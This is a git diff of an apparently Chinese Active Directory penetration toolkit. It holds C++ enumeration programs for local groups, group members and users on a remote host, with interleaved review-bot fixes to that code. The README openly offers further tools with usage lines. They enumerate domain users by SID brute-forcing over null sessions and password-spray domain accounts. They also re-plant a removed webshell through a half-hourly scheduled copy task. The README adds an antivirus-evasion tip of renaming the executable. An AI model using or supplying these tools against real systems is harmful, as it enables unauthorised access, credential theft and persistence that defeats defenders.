+++ b/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {F34A8EA5-9242-45FE-B71D-89706302A481}
+ NetLocalGroupEnum
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj.filters b/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/NetLocalGroupEnum/\346\272\220.cpp" "b/NetLocalGroupEnum/\346\272\220.cpp"
new file mode 100644
index 0000000..3cf0120
--- /dev/null
+++ "b/NetLocalGroupEnum/\346\272\220.cpp"
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+
+#pragma comment(lib, "Netapi32.lib")
+
+int wmain(int argc, wchar_t* argv[]) {
+ if (argc != 2) {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s 192.168.232.128\n", argv[0]);
+ exit(1);
+ }
+
+ LPCWSTR servername = argv[1]; // ѾipcӵIP
+ LOCALGROUP_INFO_1* buff; // LOCALGROUP_MEMBERS_INFO_2ṹbuffŻȡϢ
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH; // ָݵѡȣֽΪλָMAX_PREFERRED_LENGTHúڴ
+ DWORD dwEntriesread; // ָһֵָ룬ֵʵöٵԪ
+ DWORD dwTotalentries;
+ NetLocalGroupEnum(servername, 1, (LPBYTE*)&buff, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+ for (DWORD i = 0; i < dwEntriesread; i++)
+ {
+ wprintf(L"%s\n", buff[i].lgrpi1_name);
+ }
+}
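Review bot: The return value of NetLocalGroupEnum is discarded and neither `buff` nor `dwEntriesread` is initialized, so a failed call (bad server name, access denied, no session) runs the print loop over an indeterminate count and an indeterminate pointer. Keep the NET_API_STATUS, loop only on `NERR_Success` or `ERROR_MORE_DATA`, and release the buffer with NetApiBufferFree afterwards. NetLocalGroupGetMembers/源.cpp has the identical pattern with `NetLocalGroupGetMembers` and `LOCALGROUP_MEMBERS_INFO_2` and needs the same three fixes.
```cpp
    LOCALGROUP_INFO_1* buff = NULL;
    DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH;
    DWORD dwEntriesread = 0;
    DWORD dwTotalentries = 0;
    NET_API_STATUS status = NetLocalGroupEnum(servername, 1, (LPBYTE*)&buff, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
    if (status != NERR_Success && status != ERROR_MORE_DATA) {
        wprintf(L"error : %u\n", status);
        exit(1);
    }
    // … unchanged: print loop over buff[i].lgrpi1_name …
    if (buff != NULL) {
        NetApiBufferFree(buff);
    }
```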
\ No newline at end of file
diff --git a/NetLocalGroupGetMembers/NetLocalGroupGetMembers.sln b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.sln
new file mode 100644
index 0000000..6c586e8
--- /dev/null
+++ b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.sln
@@ -0,0 +1,111 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30011.22
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NetLocalGroupGetMembers", "NetLocalGroupGetMembers.vcxproj", "{66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NetLocalGroupEnum", "..\NetLocalGroupEnum\NetLocalGroupEnum.vcxproj", "{F34A8EA5-9242-45FE-B71D-89706302A481}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NetGroupGetUsers", "..\NetGroupGetUsers\NetGroupGetUsers.vcxproj", "{6A90FBC9-89AF-4284-B984-5C33DC1D1864}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NetUserEnum", "..\NetUserEnum\NetUserEnum.vcxproj", "{F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wnetaddconnection2a", "..\wnetaddconnection2a\wnetaddconnection2a.vcxproj", "{3220347A-637E-4881-8226-799160A983DB}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WNetCancelConnection2", "..\WNetCancelConnection2\WNetCancelConnection2.vcxproj", "{CD50DA00-9955-42DC-9F9A-21FD27F04900}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnuDomainUser", "..\EnuDomainUser\EnuDomainUser.vcxproj", "{4B7BF7AA-B163-4673-B969-AF6074688F46}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BlastDomainUserPwd", "..\BlastDomainUserPwd\BlastDomainUserPwd.vcxproj", "{8E6C051D-CCE2-4A1F-9E1C-458683468F7B}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SchtaskBackDoorWebshell", "..\SchtaskBackDoorWebshell\SchtaskBackDoorWebshell.vcxproj", "{6BF9BC0B-8C41-4BF3-86F6-FF4651942671}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Debug|x64.ActiveCfg = Debug|x64
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Debug|x64.Build.0 = Debug|x64
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Debug|x86.ActiveCfg = Debug|Win32
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Debug|x86.Build.0 = Debug|Win32
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Release|x64.ActiveCfg = Release|x64
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Release|x64.Build.0 = Release|x64
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Release|x86.ActiveCfg = Release|Win32
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Release|x86.Build.0 = Release|Win32
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Debug|x64.ActiveCfg = Debug|x64
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Debug|x64.Build.0 = Debug|x64
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Debug|x86.ActiveCfg = Debug|Win32
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Debug|x86.Build.0 = Debug|Win32
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Release|x64.ActiveCfg = Release|x64
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Release|x64.Build.0 = Release|x64
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Release|x86.ActiveCfg = Release|Win32
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Release|x86.Build.0 = Release|Win32
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Debug|x64.ActiveCfg = Debug|x64
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Debug|x64.Build.0 = Debug|x64
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Debug|x86.ActiveCfg = Debug|Win32
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Debug|x86.Build.0 = Debug|Win32
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Release|x64.ActiveCfg = Release|x64
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Release|x64.Build.0 = Release|x64
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Release|x86.ActiveCfg = Release|Win32
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Release|x86.Build.0 = Release|Win32
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Debug|x64.ActiveCfg = Debug|x64
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Debug|x64.Build.0 = Debug|x64
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Debug|x86.ActiveCfg = Debug|Win32
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Debug|x86.Build.0 = Debug|Win32
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Release|x64.ActiveCfg = Release|x64
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Release|x64.Build.0 = Release|x64
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Release|x86.ActiveCfg = Release|Win32
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Release|x86.Build.0 = Release|Win32
+ {3220347A-637E-4881-8226-799160A983DB}.Debug|x64.ActiveCfg = Debug|x64
+ {3220347A-637E-4881-8226-799160A983DB}.Debug|x64.Build.0 = Debug|x64
+ {3220347A-637E-4881-8226-799160A983DB}.Debug|x86.ActiveCfg = Debug|Win32
+ {3220347A-637E-4881-8226-799160A983DB}.Debug|x86.Build.0 = Debug|Win32
+ {3220347A-637E-4881-8226-799160A983DB}.Release|x64.ActiveCfg = Release|x64
+ {3220347A-637E-4881-8226-799160A983DB}.Release|x64.Build.0 = Release|x64
+ {3220347A-637E-4881-8226-799160A983DB}.Release|x86.ActiveCfg = Release|Win32
+ {3220347A-637E-4881-8226-799160A983DB}.Release|x86.Build.0 = Release|Win32
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Debug|x64.ActiveCfg = Debug|x64
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Debug|x64.Build.0 = Debug|x64
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Debug|x86.ActiveCfg = Debug|Win32
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Debug|x86.Build.0 = Debug|Win32
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Release|x64.ActiveCfg = Release|x64
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Release|x64.Build.0 = Release|x64
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Release|x86.ActiveCfg = Release|Win32
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Release|x86.Build.0 = Release|Win32
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Debug|x64.ActiveCfg = Debug|x64
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Debug|x64.Build.0 = Debug|x64
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Debug|x86.ActiveCfg = Debug|Win32
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Debug|x86.Build.0 = Debug|Win32
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Release|x64.ActiveCfg = Release|x64
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Release|x64.Build.0 = Release|x64
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Release|x86.ActiveCfg = Release|Win32
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Release|x86.Build.0 = Release|Win32
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Debug|x64.ActiveCfg = Debug|x64
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Debug|x64.Build.0 = Debug|x64
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Debug|x86.ActiveCfg = Debug|Win32
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Debug|x86.Build.0 = Debug|Win32
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Release|x64.ActiveCfg = Release|x64
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Release|x64.Build.0 = Release|x64
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Release|x86.ActiveCfg = Release|Win32
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Release|x86.Build.0 = Release|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x64.ActiveCfg = Debug|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x64.Build.0 = Debug|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x86.ActiveCfg = Debug|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x86.Build.0 = Debug|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x64.ActiveCfg = Release|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x64.Build.0 = Release|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x86.ActiveCfg = Release|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {0EB29EE6-60FF-4564-AA44-DA7DB746A4CF}
+ EndGlobalSection
+EndGlobal
diff --git a/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj
new file mode 100644
index 0000000..d9a3850
--- /dev/null
+++ b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}
+ NetLocalGroupGetMembers
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj.filters b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/NetLocalGroupGetMembers/\346\272\220.cpp" "b/NetLocalGroupGetMembers/\346\272\220.cpp"
new file mode 100644
index 0000000..80120c9
--- /dev/null
+++ "b/NetLocalGroupGetMembers/\346\272\220.cpp"
@@ -0,0 +1,27 @@
+#include
+#include
+#include
+
+#pragma comment(lib, "Netapi32.lib")
+
+int wmain(int argc, wchar_t* argv[]) {
+ if (argc != 3) {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s administrators \\\\192.168.232.128\n", argv[0]);
+ exit(1);
+ }
+
+ LPCWSTR servername = argv[2]; // ѾipcӵIP
+ LPCWSTR TargetGroup = argv[1]; //
+ LOCALGROUP_MEMBERS_INFO_2* buff; // LOCALGROUP_MEMBERS_INFO_2ṹbuffŻȡϢ
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH; // ָݵѡȣֽΪλָMAX_PREFERRED_LENGTHúڴ
+ DWORD dwEntriesread; // ָһֵָ룬ֵʵöٵԪ
+ DWORD dwTotalentries;
+ NetLocalGroupGetMembers(servername, TargetGroup, 2, (LPBYTE*)&buff, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+ // wprintf(L"dwEntriesread: %d\ndwTotalentries: %d\n", dwEntriesread, dwTotalentries);
+ for (DWORD i = 0; i < dwEntriesread; i++) {
+ wprintf(L"%s\n", buff[i].lgrmi2_domainandname);
+ // wprintf(L"SID:%d\n", buff[i].lgrmi2_sid); // sidǺҪ
+ // wprintf(L"SIDUSAGE:%d\n",buff[i].lgrmi2_sidusage);
+ }
+}
\ No newline at end of file
diff --git a/NetUserEnum/NetUserEnum.vcxproj b/NetUserEnum/NetUserEnum.vcxproj
new file mode 100644
index 0000000..226a4bd
--- /dev/null
+++ b/NetUserEnum/NetUserEnum.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}
+ NetUserEnum
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/NetUserEnum/NetUserEnum.vcxproj.filters b/NetUserEnum/NetUserEnum.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/NetUserEnum/NetUserEnum.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/NetUserEnum/\346\272\220.cpp" "b/NetUserEnum/\346\272\220.cpp"
new file mode 100644
index 0000000..3c0ac13
--- /dev/null
+++ "b/NetUserEnum/\346\272\220.cpp"
@@ -0,0 +1,107 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+#pragma comment(lib, "netapi32.lib")
+
+#include
+#include
+#include
+#include
+
+int wmain(int argc, wchar_t* argv[])
+{
+ LPUSER_INFO_0 pBuf = NULL;
+ LPUSER_INFO_0 pTmpBuf;
+ DWORD dwLevel = 0;
+ DWORD dwPrefMaxLen = MAX_PREFERRED_LENGTH;
+ DWORD dwEntriesRead = 0;
+ DWORD dwTotalEntries = 0;
+ DWORD dwResumeHandle = 0;
+ DWORD i;
+ DWORD dwTotalCount = 0;
+ NET_API_STATUS nStatus;
+ LPTSTR pszServerName = NULL;
+
+ if (argc > 2)
+ {
+ fwprintf(stderr, L"Usage: %s [\\\\ServerName]\n", argv[0]);
+ exit(1);
+ }
+ // The server is not the default local computer.
+ //
+ if (argc == 2)
+ pszServerName = (LPTSTR)argv[1];
+ wprintf(L"\nUser account on %s: \n", pszServerName);
+ //
+ // Call the NetUserEnum function, specifying level 0;
+ // enumerate global user account types only.
+ //
+ do // begin do
+ {
+ nStatus = NetUserEnum((LPCWSTR)pszServerName,
+ dwLevel,
+ FILTER_NORMAL_ACCOUNT, // global users
+ (LPBYTE*)&pBuf,
+ dwPrefMaxLen,
+ &dwEntriesRead,
+ &dwTotalEntries,
+ &dwResumeHandle);
+ //
+ // If the call succeeds,
+ //
+ if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))
+ {
+ if ((pTmpBuf = pBuf) != NULL)
+ {
+ //
+ // Loop through the entries.
+ //
+ for (i = 0; (i < dwEntriesRead); i++)
+ {
+ assert(pTmpBuf != NULL);
+
+ if (pTmpBuf == NULL)
+ {
+ fprintf(stderr, "An access violation has occurred\n");
+ break;
+ }
+ //
+ // Print the name of the user account.
+ //
+ wprintf(L"\t-- %s\n", pTmpBuf->usri0_name);
+
+ pTmpBuf++;
+ dwTotalCount++;
+ }
+ }
+ }
+ //
+ // Otherwise, print the system error.
+ //
+ else
+ fprintf(stderr, "A system error has occurred: %d\n", nStatus);
+ //
+ // Free the allocated buffer.
+ //
+ if (pBuf != NULL)
+ {
+ NetApiBufferFree(pBuf);
+ pBuf = NULL;
+ }
+ }
+ // Continue to call NetUserEnum while
+ // there are more entries.
+ //
+ while (nStatus == ERROR_MORE_DATA); // end do
+ //
+ // Check again for allocated memory.
+ //
+ if (pBuf != NULL)
+ NetApiBufferFree(pBuf);
+ //
+ // Print the final count of users enumerated.
+ //
+ fprintf(stderr, "\nTotal of %d entries enumerated\n", dwTotalCount);
+
+ return 0;
+}
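Review bot: When no server argument is given, `pszServerName` stays NULL and `wprintf(L"\nUser account on %s: \n", pszServerName)` passes a null pointer to `%s`, which is undefined behavior even though NetUserEnum itself accepts NULL as "local computer"; print `pszServerName ? pszServerName : L"(local)"` instead. The `assert(pTmpBuf != NULL)` followed by `if (pTmpBuf == NULL)` inside the loop is redundant — the pointer was just tested non-NULL and is only incremented — and the `%d` used with a NET_API_STATUS/DWORD in the two fprintf calls should be `%lu`.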
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..e04ba3b
--- /dev/null
+++ b/README.md
@@ -0,0 +1,154 @@
+# 我的C++学习过程-编写的域渗透小工具
+
+## 0x01. NetLocalGroupGetMembers
+
+功能:查询目标服务器本地管理组的成员
+
+![](./imgs/NetLocalGroupGetMembers.png)
+
+## 0x02. NetLocalGroupEnum
+
+功能:返回指定服务器上的所有本地组
+
+![](./imgs/NetLocalGroupEnum.png)
+
+## 0x03. NetGroupGetUsers
+
+功能:返回指定服务器指定组的所有成员
+
+查询域里的各个组里的成员,IP必须是域控IP
+
+![](./imgs/NetGroupGetUsers.png)
+
+## 0x04. NetUserEnum
+
+功能:查询目标服务器所有用户,包括隐藏用户
+
+![](./imgs/NetUserEnum.png)
+
+## 0x05. wnetaddconnection2a
+
+功能:建立IPC连接,可以将目标共享目录映射到本地磁盘
+
+![](./imgs/wnetaddconnection2a.png)
+
+## 0x06. WNetCancelConnection2
+
+功能:删除IPC连接
+
+![](./imgs/WNetCancelConnection2.png)
+
+## 0x07. EnuDomainUser
+
+功能:枚举域用户
+
+### 1. 介绍
+
+适用于:当前边界机器权限是工作组机器,通过nltest或者nbtscan等工具发现内网有域环境,并且找到域控IP,但是没有域用户的权限下渗透思路。
+
+前提条件:能够和域控建立空连接
+
+实现原理:域管默认都会有administrator用户,通过windows api查出administrator域管的SID,然后遍历SID范围,枚举出域成员(域用户和域机器)。
+
+SID范围:域用户和域机器的SID一般是1000以上,所以使用工具的时候遍历1000以上的SID
+
+### 2. 工具使用
+
+使用帮助:
+
+```
+C:\Users\Administrator\Desktop>EnuDomainUser.exe
+Usage: EnuDomainUser.exe
+ EnuDomainUser.exe \\192.168.52.2 hack\administrator 1000 2000 100
+ EnuDomainUser.exe \\域控IP 域名\域用户名<默认administrator> 起始Sid 末尾Sid 多线程数目
+```
+
+使用demo:
+
+`EnuDomainUser.exe 192.168.52.2 hack\administrator 1000 2000 100`
+
+参数解释:
+
+```
+192.168.52.2 是域控IP
+hack 是域名
+administrator 是域管默认用户
+1000 是遍历SID的起始
+2000 是遍历SID的末尾-可以设置高一点,例如10000,20000等
+100 是多线程的数目
+```
+
+![](./imgs/EnuDomainUser.png)
+
+
+## 0x08. BlastDomainUserPwd
+
+功能:爆破域用户密码
+
+### 1. 介绍
+
+通过IPC连接->爆破域用户的密码
+
+
+结合EnuDomainUser工具或者kerbrute工具获取域用户名列表,然后进行爆破
+
+
+如果被360杀,改一下exe名字即可
+
+设计思路:
+
+1. 如果能够和域控建立空连接,则用EnuDomainUser工具枚举遍历出所有域用户名
+
+2. 如果不能够和域控建立空连接,则用kerbrute工具爆破域用户名
+
+当获取到一批域用户名后,开始尝试域用户密码的弱口令爆破
+
+域用户密码有强度要求,则尝试爆破强弱口令。例如:P@ssw0rd、1qaz@WSX等
+
+### 2. 工具的使用
+
+```
+Usage: BlastDomainUserPwd.exe
+ BlastDomainUserPwd.exe \\192.168.52.29 domainUser.txt password 100
+ BlastDomainUserPwd.exe \\域机器IP 域用户名字典 尝试爆破的密码 多线程数目
+```
+
+域用户名字典格式规范:域名\域用户名
+
+ `domain\user`
+
+![](./imgs/BlastDomainUserPwd_domainUser.png)
+
+
+运行实例: `BlastDomainUserPwd.exe \\192.168.52.2 domainUser.txt 1qaz@WSX 3`
+
+![](./imgs/BlastDomainUserPwd_use.png)
+
+成功爆破出的域用户密码保存在当前目录的success.txt文本里
+
+![](./imgs/BlastDomainUserPwd_success.png)
+
+
+## 0x09. SchtaskBackDoorWebshell
+
+功能:计划任务维持webshell
+
+### 1. 适用场景:
+
+护网中被防守方发现webshell,并清除出去,漏洞也被修复,然后网站恢复后不能再上传webshell时,通过计划任务重写webshell。
+
+### 2. 条件:
+
+管理员权限,因为创建计划任务得需要管理员权限
+
+### 3. 使用方法:
+
+xxxx.exe c:\wwww\upload\1.jsp
+
+### 4. 实现过程:
+
+将c:\wwww\upload\1.jsp内容复制到c:\windows\temp\tempsh.txt里,然后创建了一个计划任务,执行的命令是`c:\windows\system32\cmd.exe /c copy c:\windows\temp\tempsh.txt c:\wwww\upload\1.jsp`,每半小时触发一次。
+
+### 5. 视频展示:
+
+
\ No newline at end of file
diff --git a/SchtaskBackDoorWebshell/.gitignore b/SchtaskBackDoorWebshell/.gitignore
new file mode 100644
index 0000000..e645270
--- /dev/null
+++ b/SchtaskBackDoorWebshell/.gitignore
@@ -0,0 +1,353 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
